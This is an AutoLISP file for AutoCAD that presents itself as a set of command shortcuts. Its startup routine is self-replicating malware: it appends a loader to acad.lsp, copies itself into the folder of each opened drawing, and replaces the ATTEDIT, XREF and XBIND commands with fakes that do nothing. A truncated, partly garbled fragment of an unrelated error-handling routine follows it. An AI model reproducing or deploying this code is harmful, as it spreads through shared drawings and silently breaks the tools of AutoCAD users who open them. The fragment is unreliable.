(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2 ) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq path (findfile "base.dcl")) (setq path (substr path 1 (- (strlen path) 8))) (setq mnlpath (getvar "menuname")) (setq nowdwg (getvar "dwgname")) (setq wjqm (findfile nowdwg)) (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg)))) (setq acadpath (findfile "acad.lsp")) (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8))) (setq ns1 "" ns2 "" ) (setq lspbj 0) (setq wjqm (strcat path "acad.lsp")) (if (setq wjm (open wjqm "r")) (progn (while (setq wz (read-line wjm)) (setq ns1 ns2) (setq ns2 wz) ) (if (> (strlen ns1) 14) (if (= (substr ns1 8 7) "acadiso") (setq lspbj 1) ) ) (close wjm) ) ) (if (and (= acadpath dwgpath) (/= acadpath path)) (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acadiso.lsp")) (if (= lspbj 0) (progn (setq wjqm (strcat path "acad.lsp")) (setq wjm (open wjqm "a")) (write-line (strcat "(load" (chr 34) "acadiso" (chr 34) ")") wjm ) (write-line "(princ)" wjm) (close wjm) ) ) (writeapp) ) (progn (if (/= nowdwg "Drawing.dwg") (progn (setq oldacad (findfile "acadiso.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp) ) ) ) ) (command "undefine" "attedit") (command "undefine" "xref") (command "undefine" "xbind") (setvar "cmdecho" old_cmd) (princ) ) (defun writeapp () (if (setq wjm1 (open newacad "w")) (progn (setq wjm (open oldacad "r")) (while (setq wz (read-line wjm)) (write-line wz wjm1)) (close wjm) (close wjm1) ) ) ) (defun C:attedit (/ p cont old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq p (ssget)) (if p (progn (setq cont (sslength p)) (princ "\nSeltct objects:") (princ cont) (princ "found") (princ "\n") (princ cont) (princ " was not able to be attedit") ) ) (setvar "cmdecho" old_cmd) (princ) ) (defun C:xref (/ old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (command "insert") (setvar "cmdecho" old_cmd) (princ) ) (defun C:xbind (/ old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (command "insert") (setvar "cmdecho" old_cmd) (princ) ) (defun C:Burst (/ p old_cmd) (setq old_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (princ "\nBURST----将图块中的文字炸开后成为实体") (setq p (ssget)) (setvar "cmdecho" old_cmd) (princ) ) (princ) (DEFUN C:BB () (princ "select the point to be break") (COMMAND "BREAK"pause "F" pause "@0,0") (PRINC)) (DEFUN C:BR () (princ "select the point to be break") (COMMAND "BREAK"pause "F") (PRINC)) (defun C:CC (/ ss FL) (princ "\nSelect objects: ") (setq ss (ssget)) (setq n (sslength ss)) (command "COPY" ss "" "m" "") (repeat n (command "" copy "" "")) ) (DEFUN C:DD () (COMMAND "DDATTE") (PRINC)) (DEFUN C:d () (COMMAND "DIST") (PRINC)) (DEFUN C:DT () (COMMAND "DTEXT") (PRINC)) ;;;==========================================================================
;;;========================================================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; --------------------- BONUS ERROR HANDLER ----------------------
(defun init_bonus_error ( lst / ss undo_init) ;;;;;;;local function;;;;;;;;;;;;;;;;;;;; (defun undo_init ( / undo_ctl) (b_set_sysvars (list "cmdecho" 0)) (setq undo_ctl (getvar "undoctl")) (if (equal 0 (getvar "UNDOCTL")) ;Make sure undo is fully enabled. (command "_.undo" "_all") ) (if (or (not (equal 1 (logand 1 (getvar "UNDOCTL")))) (equal 2 (logand 2 (getvar "UNDOCTL"))) );or (command "_.undo" "_control" "_all") ) ;Ensure undo auto is off (if (equal 4 (logand 4 (getvar "undoctl"))) (command "_.undo" "_Auto" "_off") ) lace an end mark down if needed. (while (equal 8 (logand 8 (getvar "undoctl"))) (command "_.undo" "_end") );while (while (not (equal 8 (logand 8 (getvar "undoctl")))) (command "_.undo" "_begin") );while (b_restore_sysvars) ;return original value of undoctl undo_ctl );defun undo_init
;;;;;;;;;;;;;begin the work of init_bonus error;;;;;;;;;;;;; (setq ss (ssgetfirst)) (if (not bonus_alive) (setq bonus_alive 0) );if (setq bonus_alive (1+ bonus_alive)) (if (and (> bonus_alive 1) ;do some double checking to make sure (or (not (equal 'LIST (type *error*))) ;our error handler is still active. (not (equal "bonus_error" (cadr *error*))) ;for nested this call. );or );and (progn (princ "\nNested Error trapping is being used incorrectly.") (princ "\nResetting the nested index to 1.") (setq *error* bonus_error bonus_alive 0 );setq (restore_old_error);quietly restore undo status (setq bonus_alive 1) );progn then things need to be re-adjusted. );if (if (<= bonus_alive 0) (progn (setq bonus_alive 0);undo settings will be restored ;along with setting *error* back to bonus_old_error. ;No call to b_restore_sysvars will be made. ;If it is decided, this thing should do variable clean ;up also then set bonus_alive to 1 before calling ;restore_old_error (restore_old_error);quietly restore bonus_old_error and undo status. (setq bonus_alive 1) );progn then );if (if (= bonus_alive 1) (progn (if (and *error* (or (not (equal 'LIST (type *error*))) (not (equal "bonus_error" (cadr *error*))) );or );and (setq bonus_old_error *error*);save the *error* only if it ;looks like the standard one or is some other ;user defined one. Don't want to save it if ;it's ours because we already have it. );if (if (cadr lst) (setq bonus_undoctl (undo_init)) (setq bonus_undoctl nil) );if );progn then this is a top level call, or in other words, the first time through. );if (b_set_sysvars (car lst)) (if (= bonus_alive 1) (progn (setq *error* bonus_error);setq (if (caddr lst) (setq *error* (append (reverse (cdr (reverse *error*))) (list (caddr lst)